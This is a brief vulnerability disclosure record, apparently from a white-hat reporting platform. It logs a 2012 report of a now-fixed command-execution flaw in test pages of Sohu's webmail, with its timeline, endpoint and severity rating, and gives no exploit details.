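2012-09-07: Details reported to the vendor; awaiting vendor action
2012-09-07: Vendor confirmed; details disclosed to the vendor only
2012-09-17: Details disclosed to core white hats and experts in the relevant field
2012-09-27: Details disclosed to regular white hats
2012-10-07: Details disclosed to trainee white hats
2012-10-22: Details disclosed to the public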
Test pages under some directories of http://mail.sohu.com/ have an arbitrary command execution vulnerability.
http://mail.sohu.com/mapp/vote/addComment.action
Already fixed.
Severity: High
Vulnerability Rank: 15
Confirmed: 2012-09-07 10:46
thanks
None yet